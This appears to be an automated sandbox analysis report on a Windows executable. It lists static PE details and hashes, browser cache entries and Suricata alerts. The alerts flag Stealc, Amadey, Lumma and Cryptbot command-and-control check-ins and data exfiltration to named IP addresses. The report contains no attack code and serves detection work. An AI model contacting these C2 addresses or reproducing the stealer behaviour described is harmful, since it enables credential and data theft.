Preview:	this.gbar_=this.gbar_\|\|{};(function(_){var window=this;.try{._.Yi=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Zi=class extends _.Q{constructor(){super()}};.}catch(e){_._DumpException(e)}.try{.var $i,aj,ej,hj,gj,cj,fj;$i=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};aj=function(){_.Na()};ej=function(a,b){(_.bj\|\|(_.bj=new cj)).set(a,b);(_.dj\|\|(_.dj=new cj)).set(b,a)};hj=function(a){if(fj===void 0){const b=new gj([],{});fj=Array.prototype.concat.call([],b).length===1}fj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.ij=function(a,b,c){a=_.tb(a,b,c);return Array.isArray(a)?a:_.Fc};._.jj=function(a,b){a=(2&b?a\|2:a&-3)\|32;return a&=-2049};_.kj=function(a,b){a===0&&(a=_.jj(a,b));return a\|1};_.lj=function(a){return!!(2&a)&&!!(4&a)\|\|!!(2048&a)};_.mj=function(a,b,c){32&b&&c\|\|(a&=-33);return a};._.pj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.ij(a,b,d);var k=h[_

Chrome Cache Entry: 94

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
URL:	https://www.google.com/async/newtab_promos
Preview:	)]}'.{"update":{"promos":{}}}

Chrome Cache Entry: 95

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	downloaded
Size (bytes):	132965
Entropy (8bit):	5.4351656704099485
Encrypted:	false
SSDEEP:	3072:fBkXyPqO7UX1Hme9kZbs4Voc5nSnXqwQ2i6o:f6yWFHrp4Voc5nSnawQ8o
MD5:	FC510E42F5482D044C11A8AAC85BB4B3
SHA1:	8D89E7E7A577D87BC3E7AD754A40C21FE06111AE
SHA-256:	CFE26170F15232B68A844660FF0FE9F15190D6475DE528E522ABB9660FA8A520
SHA-512:	B4B4068E143EEF7FB7BA9D71479FB76EB67320DBE62FA8299B666FE7E55CD07DED722DB73BFE854E239F102C1FB77A928A09851AEE79B4155B7FD6A8459E8505
Malicious:	false
URL:	https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

Chrome Cache Entry: 96

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (5162), with no line terminators
Category:	downloaded
Size (bytes):	5162
Entropy (8bit):	5.3503139230837595
Encrypted:	false
SSDEEP:	96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
MD5:	7977D5A9F0D7D67DE08DECF635B4B519
SHA1:	4A66E5FC1143241897F407CEB5C08C36767726C1
SHA-256:	FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
SHA-512:	8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
Malicious:	false
URL:	"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
Preview:	.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

Chrome Cache Entry: 97

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1660
Entropy (8bit):	4.301517070642596
Encrypted:	false
SSDEEP:	48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
MD5:	554640F465EB3ED903B543DAE0A1BCAC
SHA1:	E0E6E2C8939008217EB76A3B3282CA75F3DC401A
SHA-256:	99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
SHA-512:	462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
Malicious:	false
URL:	https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.943914577475808
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'789'440 bytes
MD5:	c524f231dbe4c55a328876f06e2a82d1
SHA1:	8d4c24359d577fcbc818158fc79554169690273b
SHA256:	9561f2e19612f381dfbe538ba59f4f6f4cefe5d0d0f26f0b7fa1fcd095b9f708
SHA512:	1020928371c8423fa4724a3d603d7b2823f97eae93190cc1337d95993acab9507bb3f361026d1757acb64c26e553ba17e6cb91020e0a525acf2b24aa167328a3
SSDEEP:	49152:EWDzR3kVKyvwxbdJ60Lsv33hf+EsV7i7EO7Hf:EA+rkhJ60YJcV69b
TLSH:	5B85334D4F818775E04784338C591BBDAB2190A6CAD096EBEFE1F4FE96A6F511BED000
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0xa85000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F701521E1DAh
cvttps2pi mm3, qword ptr [ebx]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [edi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax*4], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 0000000Ah
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], bl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 0000000Ah
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x24b04d	0x61	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x24a000	0x2b0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x24b1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x249000	0x16200	6345ce84e3a6f41e6db15bd63e9404d2	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x24a000	0x2b0	0x200	0d6e826adbb46f60c7e91e3c39b33c7b	False	0.79296875	data	6.084577861162248	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x24b000	0x1000	0x200	0d0399d83a742d5d86c5718841e8e842	False	0.134765625	data	0.8646718654202081	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x24c000	0x29d000	0x200	d671377182aa44e8baccf0ad2a9f9364	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
wkrmqwho	0x4e9000	0x19b000	0x19b000	bc4708e02fee2b3d72cdd7dc86812107	False	0.9946027695407542	data	7.952864743904478	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
fzxxpvmm	0x684000	0x1000	0x400	ea8378c7e0fb0daa7d99ccda01ba5749	False	0.8359375	data	6.237956597718888	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x685000	0x3000	0x2200	cb66122df84d6f149f721d7f406d7da4	False	0.08490349264705882	DOS executable (COM)	0.9380233261661467	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x683c84	0x256	ASCII text, with CRLF line terminators			0.5100334448160535

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-22T20:35:03.968551+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	49730	185.215.113.206	80	TCP
2024-11-22T20:35:04.410955+0100	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.4	49730	185.215.113.206	80	TCP
2024-11-22T20:35:04.535867+0100	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.206	80	192.168.2.4	49730	TCP
2024-11-22T20:35:04.855737+0100	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.4	49730	185.215.113.206	80	TCP
2024-11-22T20:35:04.977868+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.206	80	192.168.2.4	49730	TCP
2024-11-22T20:35:06.417034+0100	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.4	49730	185.215.113.206	80	TCP
2024-11-22T20:35:07.118820+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.206	80	TCP
2024-11-22T20:35:22.342340+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49750	185.215.113.206	80	TCP
2024-11-22T20:35:24.268920+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49750	185.215.113.206	80	TCP
2024-11-22T20:35:25.685751+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49750	185.215.113.206	80	TCP
2024-11-22T20:35:26.837640+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49750	185.215.113.206	80	TCP
2024-11-22T20:35:30.436139+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49750	185.215.113.206	80	TCP
2024-11-22T20:35:31.513119+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49750	185.215.113.206	80	TCP
2024-11-22T20:35:37.139508+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49759	185.215.113.16	80	TCP
2024-11-22T20:36:06.094921+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.4	49782	185.215.113.43	80	TCP
2024-11-22T20:36:10.680927+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49794	31.41.244.11	80	TCP
2024-11-22T20:36:21.027800+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.4	49789	TCP
2024-11-22T20:36:22.418143+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49821	185.215.113.43	80	TCP
2024-11-22T20:36:24.073232+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49823	185.215.113.16	80	TCP
2024-11-22T20:36:31.462265+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49842	185.215.113.43	80	TCP
2024-11-22T20:36:32.521212+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49845	172.67.162.84	443	TCP
2024-11-22T20:36:32.963251+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49846	185.215.113.16	80	TCP
2024-11-22T20:36:33.243107+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49845	172.67.162.84	443	TCP
2024-11-22T20:36:33.243107+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49845	172.67.162.84	443	TCP
2024-11-22T20:36:34.590345+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49852	172.67.162.84	443	TCP
2024-11-22T20:36:35.392630+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49852	172.67.162.84	443	TCP
2024-11-22T20:36:35.392630+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49852	172.67.162.84	443	TCP
2024-11-22T20:36:37.226843+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49858	172.67.162.84	443	TCP
2024-11-22T20:36:40.006155+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49864	185.215.113.43	80	TCP
2024-11-22T20:36:40.762421+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49871	172.67.162.84	443	TCP
2024-11-22T20:36:41.433205+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	49870	185.215.113.206	80	TCP
2024-11-22T20:36:41.492658+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49872	185.215.113.16	80	TCP
2024-11-22T20:36:43.392090+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49878	172.67.162.84	443	TCP
2024-11-22T20:36:46.492104+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49884	172.67.162.84	443	TCP
2024-11-22T20:36:46.812170+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49885	172.67.162.84	443	TCP
2024-11-22T20:36:47.248102+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49886	185.215.113.43	80	TCP
2024-11-22T20:36:47.380384+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49884	172.67.162.84	443	TCP
2024-11-22T20:36:47.380384+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49884	172.67.162.84	443	TCP
2024-11-22T20:36:47.643561+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49885	172.67.162.84	443	TCP
2024-11-22T20:36:48.786944+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49893	172.67.162.84	443	TCP
2024-11-22T20:36:48.799280+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49892	185.215.113.16	80	TCP
2024-11-22T20:36:49.309883+0100	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49896	34.116.198.130	80	TCP
2024-11-22T20:36:49.922885+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49902	172.67.162.84	443	TCP
2024-11-22T20:36:50.626684+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49893	172.67.162.84	443	TCP
2024-11-22T20:36:50.626684+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49893	172.67.162.84	443	TCP
2024-11-22T20:36:51.216120+0100	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49906	34.116.198.130	80	TCP
2024-11-22T20:36:53.764372+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49912	172.67.162.84	443	TCP
2024-11-22T20:36:56.963516+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49921	172.67.162.84	443	TCP
2024-11-22T20:36:57.567639+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49924	185.215.113.43	80	TCP
2024-11-22T20:36:57.860754+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49928	172.67.162.84	443	TCP
2024-11-22T20:36:58.191722+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	49926	185.215.113.206	80	TCP
2024-11-22T20:36:58.591029+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49928	172.67.162.84	443	TCP
2024-11-22T20:37:00.115386+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.4	49939	185.215.113.16	80	TCP
2024-11-22T20:37:01.283239+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49941	172.67.162.84	443	TCP
2024-11-22T20:37:02.662426+0100	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49947	34.116.198.130	80	TCP
2024-11-22T20:37:06.351082+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49956	172.67.162.84	443	TCP
2024-11-22T20:37:10.508064+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49983	172.67.162.84	443	TCP
2024-11-22T20:37:11.576116+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.4	49983	172.67.162.84	443	TCP
2024-11-22T20:37:13.093614+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49998	172.67.162.84	443	TCP
2024-11-22T20:37:14.669890+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49998	172.67.162.84	443	TCP
2024-11-22T20:37:16.202162+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.4	50008	185.215.113.16	80	TCP
2024-11-22T20:37:27.240162+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	50033	185.215.113.206	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 22, 2024 20:34:52.484431982 CET	49675	443	192.168.2.4	173.222.162.32
Nov 22, 2024 20:35:02.052856922 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:02.093594074 CET	49675	443	192.168.2.4	173.222.162.32
Nov 22, 2024 20:35:02.175373077 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:02.175522089 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:02.175725937 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:02.299274921 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:03.515705109 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:03.515765905 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:03.518321991 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:03.638016939 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:03.968451023 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:03.968550920 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:03.969986916 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:04.091304064 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:04.410852909 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:04.410954952 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:04.410965919 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:04.411062956 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:04.412189960 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:04.535866976 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:04.855616093 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:04.855650902 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:04.855668068 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:04.855736971 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:04.855778933 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:04.855822086 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:04.855827093 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:04.855827093 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:04.855844975 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:04.855882883 CET	49730	80	192.168.2.4	185.215.113.206
